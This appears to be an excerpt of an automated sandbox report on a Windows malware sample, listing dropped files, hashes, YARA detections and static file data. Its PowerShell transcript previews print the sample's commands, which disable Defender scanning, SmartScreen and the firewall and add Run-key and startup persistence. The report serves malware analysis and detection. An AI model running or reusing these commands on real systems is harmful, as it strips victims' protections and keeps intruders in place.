                                                                                                                                                                                SHA-256:735D3E2EB44123FE560CE027B907B3B1494B0F926ACEB641DCDF428A21B8AAC0
                                                                                                                                                                                SHA-512:258ECE4A4530B07D4B2840D44168CFD829C0E65D562D5B2E5E94281FFCA3DCF631B22799FD0C5EEFBD40249E72709DC2ACAF1FF99B5FEE0741C3DF942ABC2535
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................:........p....p....p...........:...>....>.X...>....Rich............................PE..L...F%.a.................^........... B......p....@.......................... h.....".'...@........................................................................................................................................................ V\......h".................. ..` 0....p..97...(..............@..@ tE...........`..............@... .....P.......b..............@..@ .....`..g....d..............@..B.imports.............~..............@....rsrc...............................@..@.themida..>.........................`....boot.....&.. B.'.%.................`..`................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\wchuwml
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):83514
                                                                                                                                                                                Entropy (8bit):3.495672104133364
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                                                MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                                                SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                                                SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                                                SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Users\user\AppData\Local\Temp\wchuwml, Author: Florian Roth
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48
                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu Nov 11 19:26:31 2021, mtime=Thu Nov 11 19:26:31 2021, atime=Thu Nov 11 19:26:10 2021, length=3731093, window=hideshowminimized
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):849
                                                                                                                                                                                Entropy (8bit):4.576337424795259
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:8i7Pi0c/XglC4eCLGoH2KdR2pSQtAKdofKMjAsSaWT1ioq/Gi9bXSQRfKUHLm:8eivgZvGfKdR2pS+dFIAslWMe0XSLcm
                                                                                                                                                                                MD5:ACA8B4D2044ABB6D0E3D5860B8A78C79
                                                                                                                                                                                SHA1:40AA69B4AD6EF4F50A7B8D3C2C0F1864EEA30DE4
                                                                                                                                                                                SHA-256:B05566D77C9E7C0B8E9CCEDD124596A2928C5FCDA48AC77788FF2C8741A32386
                                                                                                                                                                                SHA-512:C986C89180C5DFE27773D7AA3A0B03C1AE15E15B71D1D3FFFCD0913355ECE403C4C54BAF3132341A123D7DC0BAE3A4781B75A516E3C9B3C0679BF3B1171C3A3A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: L..................F.... ......j:......j:.....s]:.....8.....................Y....P.O. .:i.....+00.../C:\...................`.1......P....PROGRA~3..H......L.kS$.....F.......................f.P.r.o.g.r.a.m.D.a.t.a.....j.1.....kSP...MICROS~4..R......kSP.kSP...............................M.i.c.r.o.s.o.f.t.N.e.t.w.o.r.k.....`.2...8.kSF. .System.exe..F......kSP.kSP............................f..S.y.s.t.e.m...e.x.e.......Y...............-.......X............ ......C:\ProgramData\MicrosoftNetwork\System.exe....l.i.n.k. .d.e.s.c.r.i.p.t.i.o.n.B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.N.e.t.w.o.r.k.\.S.y.s.t.e.m...e.x.e.`.......X.......414408...........!a..%.H.VZAj.....-C.......W...!a..%.H.VZAj.....-C.......W..E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                C:\Users\user\Documents\20211111\PowerShell_transcript.414408.pwuLZQr5.20211111122656.txt
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17007
                                                                                                                                                                                Entropy (8bit):5.489769147820288
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:BZ8/jNs0ObfbWsJW8eKJqDo1Z50ObfbWsJW8eKDZL/jNs0ObfbWsJW8eKJqDo1Zq:jeKteKAeK8eKSeKieKPeKMLLy
                                                                                                                                                                                MD5:93218BD5FF49DA0F2FE95FCC5D8BE89B
                                                                                                                                                                                SHA1:EA733E2D91A33E0AC7458268FA33E2039D6D4C81
                                                                                                                                                                                SHA-256:04442DAD2EBA78E32BC81ECF942046F2CD0EAF52C7F5C72C6D1987F546D2291A
                                                                                                                                                                                SHA-512:6ADED6E81DD8098845D897CB1EDC640E2BC5EF62B05A57BE36584FD47F0A81C139A23FAEDE0AEE87BEB46D2940C2E0F67C080FAAA4F4F6524072FABB90A37420
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211111122659..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty .Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System .Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty .Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run .Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.tx
                                                                                                                                                                                C:\Users\user\Documents\20211111\PowerShell_transcript.414408.ttwDg5IK.20211111122632.txt
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):11683
                                                                                                                                                                                Entropy (8bit):5.495906878885671
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:BZP/jNs0ObfbWsJW8eK/qDo1ZI0ObfbWsJW8eKDZo/jNs0ObfbWsJW8eK/qDo1Z9:SeKyeKpeKdeKToeK4fh
                                                                                                                                                                                MD5:365B6B774D3462EAFAE12A41F6676872
                                                                                                                                                                                SHA1:12CA8278A1AC24CBFB1EE38B19C7855B5AEBFCB0
                                                                                                                                                                                SHA-256:A68505CA60D37C6F565C27C21CAAA6A99C814B02B3614139C19CA44842EBC280
                                                                                                                                                                                SHA-512:4CE39F5B429AE295907203CDEC3C9977CEE256860844D3C3021AC48E9EA3315195322483C8C30EFD19D9908BEC4B9A2B071FE6B3DB390E63E6E590E60B7DB55D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211111122636..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty .Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System .Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty .Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run .Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.tx
                                                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):9709
                                                                                                                                                                                Entropy (8bit):4.925370375539915
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOE:6fib4Glkjh4iUxs14r4Lib41
                                                                                                                                                                                MD5:37AED58F152582BDB058325D28DCC407
                                                                                                                                                                                SHA1:8D26BD9238E1BFD3BA661029D51C0E735CE29AE0
                                                                                                                                                                                SHA-256:52715A53B3D20A6510A4F97B6D20C69070A2BC0686BA1FF13E1E7BC5752EE2BA
                                                                                                                                                                                SHA-512:5ACC01C774A989714EBD956899334D327BB0C34C443DA1035275B209E793196AFC91ACC8A57D3E77EE935A2350CADC123F799AC00DC6D0DD9367DE31EA58131F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_02llss0r.nwk.psm1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1
                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_f30l23vs.ifw.ps1
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1
                                                                                                                                                                                C:\Windows\Temp\aut5BC3.tmp
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):25822
                                                                                                                                                                                Entropy (8bit):7.676686877584948
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                                                MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                                                SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                                                SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                                                SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_
                                                                                                                                                                                C:\Windows\Temp\aut7B12.tmp
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):25822
                                                                                                                                                                                Entropy (8bit):7.676686877584948
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                                                MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                                                SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                                                SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                                                SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_
                                                                                                                                                                                C:\Windows\Temp\autAA9E.tmp
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):25822
                                                                                                                                                                                Entropy (8bit):7.676686877584948
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                                                                                                                                MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                                                                                                                                SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                                                                                                                                SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                                                                                                                                SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_
                                                                                                                                                                                C:\Windows\Temp\dhfqtab
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):83514
                                                                                                                                                                                Entropy (8bit):3.495672104133364
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                                                MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                                                SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                                                SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                                                SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\dhfqtab, Author: Florian Roth
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48
                                                                                                                                                                                C:\Windows\Temp\qmpezjm
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):83514
                                                                                                                                                                                Entropy (8bit):3.495672104133364
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                                                MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                                                SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                                                SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                                                SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\qmpezjm, Author: Florian Roth
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48
                                                                                                                                                                                C:\Windows\Temp\zldwyyp
                                                                                                                                                                                Process:C:\ProgramData\UpSys.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):83514
                                                                                                                                                                                Entropy (8bit):3.495672104133364
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                                                                                                                                MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                                                                                                                                SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                                                                                                                                SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                                                                                                                                SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\zldwyyp, Author: Florian Roth
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Entropy (8bit):7.822587766316362
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                File name:We7WnoqeXe.exe
                                                                                                                                                                                File size:3075288
                                                                                                                                                                                MD5:382d9703b3918169ddc982d766509aec
                                                                                                                                                                                SHA1:e04f97d805ac8e194923313f1ac7a945c8aea22c
                                                                                                                                                                                SHA256:dfb04cffc12e51649a779ad6790f45bca391b0191a1842f3f3b53e68b30b87d5
                                                                                                                                                                                SHA512:a48842f54ec459f4d57491b1c6dac82403111c4863b5ed657abbc0babfd791ebd892b705c74f3cf4166f9d0a18dce740043cb67962aeb5703a83e50d1dfaf7c5
